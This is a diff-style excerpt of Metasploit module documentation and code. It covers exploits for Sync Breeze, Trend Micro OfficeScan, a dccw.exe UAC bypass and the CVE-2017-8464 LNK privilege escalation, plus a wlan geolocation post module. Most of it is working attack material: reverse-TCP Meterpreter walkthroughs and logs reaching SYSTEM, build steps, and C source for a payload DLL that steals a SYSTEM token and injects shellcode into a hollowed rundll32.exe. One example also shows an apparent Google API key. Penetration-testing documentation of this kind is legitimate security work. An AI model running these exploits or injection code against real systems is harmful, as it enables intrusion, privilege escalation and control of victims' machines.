9. Do `set RHOST ip`
10. Do `check`
11. Verify the target is vulnerable
12. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
13. Do `set LHOST ip`
14. Do `exploit`
15. Verify the Meterpreter session is opened
## Scenarios
@ -72,3 +73,34 @@ Logged On Users : 3
Meterpreter : x86/windows
meterpreter >
```
###Sync Breeze Enterprise v10.0.28 on Windows 7 SP1
```
msf > use exploit/windows/http/syncbreeze_bof
msf exploit(syncbreeze_bof) > set rhost 192.168.10.61
rhost => 192.168.10.61
msf exploit(syncbreeze_bof) > set target 1
target => 1
msf exploit(syncbreeze_bof) > exploit
[*] Started reverse TCP handler on 192.168.10.60:4444
[*] Sending request...
[*] Sending stage (171583 bytes) to 192.168.10.61
[*] Meterpreter session 1 opened (192.168.10.60:4444 -> 192.168.10.61:4129) at 2017-10-09 13:22:15 -0400
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : MUSHROOMKINGDOM
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```

View File

@ -0,0 +1,60 @@
## Vulnerable Application
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.
The Trend Micro OfficeScan product has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.
**Vulnerable Application Installation Steps**
1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
2. Find "OfficeScan" and click.
3. At the time of writing this documentation, you must see "osce-xg-win-en-gm-b1315.exe" next to Download button.
4. Click to the download button and complete installation of ISO.
5. Install the downloaded file on Windows operating system. (Tested with Windows 7)
If you don't see an affected version of OfficeScan, you can try to download it directly from following URL.
[http://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe](http://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe)
## Verification Steps
A successful check of the exploit will look like this:
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/trendmicro_officescan_widget_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target is vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `Authenticated successfully bypassed` value.
- [ ] **Verify** that you are getting `meterpreter` session.
## Scenarios
### Trend Micro OfficeScan 11 on Win7
```
msf exploit(trendmicro_officescan_widget_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Auto detection enabled. Trying to detect target system version.
[*] Target system selected : OfficeScan 11
[*] Exploiting authentication bypass
[+] Authenticated successfully bypassed.
[*] Generating payload
[*] Trigerring command injection vulnerability
[*] Sending stage (179267 bytes) to 12.0.0.176
[*] Meterpreter session 9 opened (12.0.0.1:4444 -> 12.0.0.176:49842) at 2017-10-09 21:57:29 +0300
meterpreter > sysinfo
Computer : CME
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : tr_TR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```

View File

@ -0,0 +1,295 @@
## Description
This module adds a bypass for UAC that relies on DLL hijacking of the dccw.exe process. It has been tested on and
supports both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703. It does not work with any versions of Windows 7.
### Vulnerable application setup
Not Applicable; works on stock Windows releases.
### Running Example:
```
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set LHOST <MSF_IP>
LHOST => <MSF_IP>
> set LPORT 30009
LPORT => 30009
> show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <MSF_IP> yes The listen address
LPORT 30009 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
> run -z
[*] Started reverse TCP handler on <MSF_IP>:30009
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:30009 -> <Win10x86_IP>:50041) at 2017-10-03 12:17:42 -0700
[*] Session 1 created in the background.
> sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (<Win10x86_IP>)
Computer : WIN10X86-1511
OS : Windows 10 (Build 10586).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x86/windows
> sessions -C ifconfig
[*] Running 'ifconfig' on meterpreter session 1 (<Win10x86_IP>)
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 2
============
Name : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : 2001:0:4137:9e76:38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:73:25:67
MTU : 1500
IPv4 Address : <Win10x86_IP>
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::cc97:6548:c10a:f034
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 6
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:86a0
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
> sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)
> use exploit/windows/local/bypassuac_injection_winsxs
> set session 1
session => 1
> set target 0
target => 0
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set lhost <MSF_IP>
lhost => <MSF_IP>
> set lport 30010
lport => 30010
> set verbose true
verbose => true
> show options
Module options (exploit/windows/local/bypassuac_injection_winsxs):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
  LHOST     <MSF_IP>   yes       The listen address
LPORT 30010 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
> run -j
[*] Exploit running as background job.
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (13 bytes)
[*] Started reverse TCP handler on <MSF_IP>:30010
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (12 bytes)
[+] Windows 10 (Build 10586). may be vulnerable.
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Creating temporary folders...
[*] Uploading the Payload DLL to the filesystem...
[*] Payload DLL 18944 bytes long being uploaded...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[*] Injecting into process ID 3476
[*] Opening process 3476
[*] Injecting struct into 3476
[*] Executing payload
[+] Successfully injected payload in to process: 3476
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:30010 -> <Win10x86_IP>:50078) at 2017-10-03 12:19:03 -0700
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[+] All the dropped elements have been successfully removed
> sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)
2 meterpreter x86/windows WIN10X86-1511\msfuser @ WIN10X86-1511 <MSF_IP>:30010 -> <Win10x86_IP>:50078 (<Win10x86_IP>)
> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
> sessions -C getsystem
[*] Running 'getsystem' on meterpreter session 1 (<Win10x86_IP>)
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[*] Running 'getsystem' on meterpreter session 2 (<Win10x86_IP>)
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
Server username: NT AUTHORITY\SYSTEM
> exit -y
```
## Compiling Instructions
### Compiling Template DLLs
To build the x86 template dll, use data/templates/src/pe/dll_gdiplus/build.sh
(Requires mingw-w64 package from apt)
```
cd data/templates/src/pe/dll_gdiplus
./build.sh
cp data/templates/src/pe/dll_gdiplus/template_x86_windows.dll data/templates/template_x86_windows_dccw_gdiplus.dll
```
To build the x64 binary
(In an x64 VS2013 command prompt)
```
Z:\metasploit-framework\data\templates\src\pe\dll_gdiplus>cl.exe -LD template.c /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain "kernel32.lib"
cp data/templates/src/pe/dll_gdiplus/template.dll data/templates/template_x64_windows_dccw_gdiplus.dll
```
### Compiling bypassuac-x86.dll and bypassuac-x64.dll
Open the Visual studio solution located in
metasploit-framework/external/source/exploits/bypassuac_injection/
Choose ```release``` from the Solution configurations, build the x86 and x64 solutions. The binaries should already
be in the right place.
# More information
(From PR)
I decided to create a different module and not to update the one called "bypassuac_injection", because in order to
perform a DLL hijacking, I need to create several folders in which insert our malicious DLL. Also, I deleted these
files and folders in a different way, instead using the method "register_file_for_cleanup()", so as to be able to
remove the created folders and also prevent a very large output.
If you want to understand the module in a deeper way I recommend you to visit the C++ project on my github:
https://github.com/L3cr0f/DccwBypassUAC
## **DLL INJECTION**
**/metasploit-framework/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
/metasploit-framework/data/post/bypassuac-x64.dll
/metasploit-framework/data/post/bypassuac-x86.dll**
To perform the DLL hijacking we need to copy the file of our interest to a specific location (in our case "C:\Windows\System32\") using IFileOperation. To do so, first we need to inject a DLL that will perform this task. This DLL is almost the same as the one used in the "bypassuac_injection" module, but, in latest Windows 10 systems (build equal or greater than 15003), the IFileOperation must be invoked in a different way so as to not trigger the UAC prompt. This modification will be:
`if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)`
to
`if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)`
Note that this modification does not affect other modules.
To conclude this section, I didn't found the code of "/metasploit-framework/data/post/bypassuac-[ARCH].exe" to update it.
## **DLL HIJACKING**
**/metasploit-framework/data/templates/template_x86_windows_dccw_gdiplus.dll
/metasploit-framework/data/templates/template_x64_windows_dccw_gdiplus.dll
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.c
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.h
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.def
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.rc
/metasploit-framework/data/templates/src/pe/dll_gdiplus/build.sh
/metasploit-framework/lib/msf/core/exploit/exe.rb
/metasploit-framework/lib/msf/util/exe.rb**
To execute code at high integrity we need to perform a DLL hijacking, but we cannot use the DLL templates provided by
Metasploit since we need to forward some functions to the legit DLL, so we need to create a new couple of DLL templates,
which are exactly the same but including the forwarding feature (the way I have implemented does not work on Windows 7).
Now, despite working in a successfully way, I think it would be great including this forwarding feature on the fly, I mean,
without having to create an additional DLL template. I don't know how this can be done, so if you come up with something,
let me know.
Also, to load the previous DLL template we have modified the mentioned "exe.rb" files.
## **Setup the vulnerable environment**
The vulnerable environment setup is the same as the module "bypassuac_injection", we need a meterpreter session, select
the architecture (0 for x86 and 1 for x64), select the meterpreter payload based on the architecture we want to execute
with high integrity and set the regular parameters of the payload (LHOST, LPORT, etc).

View File

@ -0,0 +1,166 @@
## Description
This module is a Windows local exploit version of the existing file
format module for CVE-2017-8464. The module works by dropping the
specially crafted LNK file and DLL to disk, which causes
`SearchProtocolHost.exe` to parse the LNK file and thus load the DLL via
the vulnerability. Due to `SearchProtocolHost.exe` running as SYSTEM,
this can be used to elevate privileges.
The original DLL template needed some significant reworking to make it
compatible for execution within `SearchProtocolHost.exe`. The payload
was originally failing in the hollowed child `rundll32.exe` process with
a denied error from winsock. This was addressed by checking if the process
which loaded the crafted DLL is `SearchProtocolHost.exe` and when it is,
it opens the token of another SYSTEM process and passes it to
`CreateProcessAsUser` for the payload to work. When the DLL is loaded
into another process or is not running as SYSTEM, this step is skipped
and `NULL` is passed as the token.
Finally a thread is spawned to keep a module reference and monitor the
child process. This is for synchronization to prevent the payload from
being executed in rapid succession from a single exploitation attempt.
The mutex was also updated to the constant of `MUTEX!!!` to leverage
Metasploit's builtin mutex name randomization, which ensures that a name
is unique per module run but not globally unique.
## Vulnerable Systems
Tested and works on
Windows 7x64 SP0
Windows 7x64 SP1
Windows 8x64
Windows 8.1x64
Windows 10x64 Build 1511
Windows 10x64 Build 1607
Windows 10x64 Build 1703
## Running Example:
```
> use exploit/multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
> set LHOST 192.168.135.112
LHOST => 192.168.135.112
> set LPORT 30001
LPORT => 30001
> show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.112 yes The listen address
LPORT 30001 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
[*] > Ruby Code (13 bytes)
> run -z
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.135.112:30001
[*] Sending stage (205379 bytes) to 192.168.134.133
[*] Meterpreter session 1 opened (192.168.135.112:30001 -> 192.168.134.133:49178) at 2017-11-06 10:22:02 -0800
> sysinfo
Computer : WIN7X64-SP0
OS : Windows 7 (Build 7600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x64/windows
> sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows WIN7X64-SP0\msfuser @ WIN7X64-SP0 192.168.135.112:30001 -> 192.168.134.133:49178 (192.168.134.133)
> use exploit/windows/local/cve_2017_8464_lnk_lpe
> set session 1
session => 1
> set target 0
target => 0
> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
> set lhost 192.168.135.112
lhost => 192.168.135.112
> set lport 30002
lport => 30002
> set verbose true
verbose => true
> show options
Module options (exploit/windows/local/cve_2017_8464_lnk_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
DLLNAME no The DLL file containing the payload
FILENAME no The LNK file
PATH no An explicit path to where the files should be written to
SESSION 1 yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.112 yes The listen address
LPORT 30002 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
> run -j
[*] Exploit running as background job 1.
[*] Started reverse TCP handler on 192.168.135.112:30002
[*] Generating LNK file to load: C:\Users\msfuser\QtGyQHZpWvmzjdsn.dll
[*] Sending stage (205379 bytes) to 192.168.134.133
[*] Meterpreter session 2 opened (192.168.135.112:30002 -> 192.168.134.133:49179) at 2017-11-06 10:23:03 -0800
[*] Waiting 15s before file cleanup...
[+] Deleted C:\Users\msfuser\HADoIQMbEQDpbbRn.lnk
[+] Deleted C:\Users\msfuser\QtGyQHZpWvmzjdsn.dll
> sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows WIN7X64-SP0\msfuser @ WIN7X64-SP0 192.168.135.112:30001 -> 192.168.134.133:49178 (192.168.134.133)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7X64-SP0 192.168.135.112:30002 -> 192.168.134.133:49179 (192.168.134.133)
> getuid
Server username: WIN7X64-SP0\msfuser
Server username: NT AUTHORITY\SYSTEM
> getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
> getuid
Server username: NT AUTHORITY\SYSTEM
> exit -y
```
## Compiling instructions
`cd ./external/source/exploits/cve-2017-8464`
`./build.sh`
(Requires `mingw-w64` package)

View File

@ -0,0 +1,66 @@
## Creating A Testing Environment
For this module to work you need a box with a wireless adapter. The following methods are used to gather
wireless information from the host:
- Windows: `netsh wlan show networks mode=bssid`
- OSX: `/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s`
- Linux: `iwlist scanning`
- Solaris: `dladm scan-wifi`
- BSD: `dmesg | grep -i wlan | cut -d ':' -f1 | uniq"`
If `GEOLOCATE` is set to true, Google's [GeoLocation APIs](https://developers.google.com/maps/documentation/geolocation/intro) are utilized.
These APIs require a Google [API key](https://developers.google.com/maps/documentation/geolocation/get-api-key) to use them. The original
methodology used by this module in [#3280](https://github.com/rapid7/metasploit-framework/pull/3280),
which didn't require an API key, was found to no longer work in [#8928](https://github.com/rapid7/metasploit-framework/issues/8928).
## Verification Steps
1. Start msfconsole
2. Obatin a meterpreter session via whatever method
3. Do: `use post/multi/gather/wlan_geolocate`
4. Do: `set session #`
5. Do: `set apikey [key]`
5. Do: `run`
## Options
**geolocate**
A boolean on if wireless information should only be gathered, or the Google geolocate API should be used to geo the victim. Defaults to `false`
**apikey**
A string containing the Google provided geolocation api key. **REQUIRED** if `geolocate` is set to true. Defaults to empty string
## Scenarios
### Windows 10
resource (met_rev.rc)> use exploit/multi/handler
resource (met_rev.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (met_rev.rc)> setg lhost 2.2.2.2
lhost => 2.2.2.2
resource (met_rev.rc)> set lport 9876
lport => 9876
resource (met_rev.rc)> setg verbose true
verbose => true
resource (met_rev.rc)> exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 2.2.2.2:9876
[*] Sending stage (179267 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:9876 -> 1.1.1.1:16111) at 2017-10-01 19:27:15 -0400
resource (met_rev.rc)> use post/multi/gather/wlan_geolocate
resource (met_rev.rc)> set geolocate true
geolocate => true
resource (met_rev.rc)> set session 1
session => 1
resource (met_rev.rc)> set apikey ANza1yFLhaK3lreck7N3S_GYbEtJE3gGg5dJe12
apikey => ANza1yFLhaK3lreck7N3S_GYbEtJE3gGg5dJe12
msf post(wlan_geolocate) > run
[+] Wireless list saved to loot.
[*] Google indicates the device is within 30.0 meters of 30.3861197,-97.7385878.
[*] Google Maps URL: https://maps.google.com/?q=30.3861197,-97.7385878
[*] Post module execution completed

View File

@ -46,7 +46,7 @@ extern "C" {
break;
}
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
{
dprintf("[BYPASSUACINJ] Couldn't Set operating flags on file op.");
break;

View File

@ -0,0 +1,17 @@
#!/bin/sh
rm -f *.o *.dll
CCx86="i686-w64-mingw32"
CCx64="x86_64-w64-mingw32"
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
${CCx64}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll
rm -f temp.dll *.o
chmod -x ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll
${CCx86}-gcc -c -Os template.c -Wall -shared
${CCx86}-dllwrap --def template.def *.o -o temp.dll
${CCx86}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll
rm -f temp.dll *.o
chmod -x ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll

View File

@ -0,0 +1,241 @@
#include <windows.h>
#include <sddl.h>
#include <tchar.h>
#include <tlhelp32.h>
#include <userenv.h>
#include "template.h"
void ExecutePayload(HANDLE hDll);
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
switch (dwReason) {
case DLL_PROCESS_ATTACH:
ExecutePayload(hDll);
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
BOOL StringEndsWithStringA(LPCSTR szStr, LPCSTR szSuffix, BOOL bCaseSensitive) {
int result;
if (strlen(szStr) < strlen(szSuffix)) {
return FALSE;
}
if (bCaseSensitive) {
result = strcmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
}
else {
result = _stricmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix);
}
return result == 0;
}
BOOL GetProcessSid(HANDLE hProc, PSID *pSid) {
HANDLE hToken;
DWORD dwLength = 0;
TOKEN_USER *tuUser = NULL;
SIZE_T szSid = 0;
*pSid = NULL;
if (!OpenProcessToken(hProc, (TOKEN_READ), &hToken)) {
return FALSE;
}
GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength);
tuUser = (TOKEN_USER *)malloc(dwLength);
if (!tuUser) {
return FALSE;
}
if (!GetTokenInformation(hToken, TokenUser, tuUser, dwLength, &dwLength)) {
free(tuUser);
return FALSE;
}
szSid = GetLengthSid(tuUser->User.Sid);
*pSid = LocalAlloc(LPTR, szSid);
if ((*pSid) && (!CopySid((DWORD)szSid, *pSid, tuUser->User.Sid))) {
LocalFree(*pSid);
*pSid = NULL;
}
free(tuUser);
CloseHandle(hToken);
return *pSid != NULL;
}
BOOL IsProcessRunningAsSidString(HANDLE hProc, LPCTSTR sStringSid, PBOOL pbResult) {
PSID pTestSid = NULL;
PSID pTargetSid = NULL;
if (!ConvertStringSidToSid(sStringSid, &pTargetSid)) {
return FALSE;
}
if (!GetProcessSid(hProc, &pTestSid)) {
LocalFree(pTargetSid);
return FALSE;
}
*pbResult = EqualSid(pTestSid, pTargetSid);
LocalFree(pTargetSid);
LocalFree(pTestSid);
return TRUE;
}
DWORD FindProcessId(LPCTSTR szProcessName) {
HANDLE hProcessSnap;
PROCESSENTRY32 pe32;
DWORD result = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE) {
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hProcessSnap, &pe32)) {
CloseHandle(hProcessSnap);
return 0;
}
do {
if (!strcmp(szProcessName, pe32.szExeFile)) {
result = pe32.th32ProcessID;
break;
}
} while (Process32Next(hProcessSnap, &pe32));
CloseHandle(hProcessSnap);
return result;
}
HANDLE GetPayloadToken(void) {
HANDLE hTokenHandle = NULL;
HANDLE hProcessHandle = NULL;
BOOL bIsSystem = FALSE;
DWORD dwPid = 0;
CHAR Path[MAX_PATH + 1];
ZeroMemory(Path, sizeof(Path));
GetModuleFileNameA(NULL, Path, MAX_PATH);
if (!StringEndsWithStringA(Path, "\\SearchProtocolHost.exe", TRUE)) {
return NULL;
}
/* loaded into the context of SearchProtocolHost.exe */
if (IsProcessRunningAsSystem(GetCurrentProcess(), &bIsSystem) && (!bIsSystem)) {
return NULL;
}
/* and running as NT_AUTHORITY SYSTEM */
dwPid = FindProcessId("spoolsv.exe");
if (!dwPid) {
return NULL;
}
hProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid);
if (!hProcessHandle) {
return NULL;
}
bIsSystem = FALSE;
if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) {
return NULL;
}
/* spoolsv.exe is also running as NT_AUTHORITY SYSTEM */
OpenProcessToken(hProcessHandle, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hTokenHandle);
CloseHandle(hProcessHandle);
return hTokenHandle;
}
DWORD WINAPI MonitorPayloadProcess(PEXPLOIT_DATA pExploitData) {
/* wait for the process to exit or 10 seconds before cleaning up */
WaitForSingleObject(pExploitData->hProcess, 10000);
CloseHandle(pExploitData->hProcess);
CloseHandle(pExploitData->hMutex);
/* this does not return */
FreeLibraryAndExitThread(pExploitData->hModule, 0);
return 0;
}
void ExecutePayload(HANDLE hDll) {
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
LPVOID ep;
SECURITY_ATTRIBUTES MutexAttributes;
SIZE_T dwBytesWritten = 0;
PEXPLOIT_DATA pExploitData = NULL;
HANDLE hToken;
pExploitData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(EXPLOIT_DATA));
if (!pExploitData) {
return;
}
/* keep a reference to the module for synchronization purposes */
GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, hDll, (HINSTANCE *)&(pExploitData->hModule));
ZeroMemory(&MutexAttributes, sizeof(MutexAttributes));
MutexAttributes.nLength = sizeof(MutexAttributes);
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
pExploitData->hMutex = CreateMutex(&MutexAttributes, TRUE, "MUTEX!!!");
if (!pExploitData->hMutex) {
return;
}
if (GetLastError() == ERROR_ALREADY_EXISTS) {
CloseHandle(pExploitData->hMutex);
return;
}
if (GetLastError() == ERROR_ACCESS_DENIED) {
CloseHandle(pExploitData->hMutex);
return;
}
hToken = GetPayloadToken();
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
/* start up the payload in a new process */
if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, &dwBytesWritten);
if (dwBytesWritten == SCSIZE) {
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
pExploitData->hProcess = pi.hProcess;
}
}
if (hToken) {
CloseHandle(hToken);
}
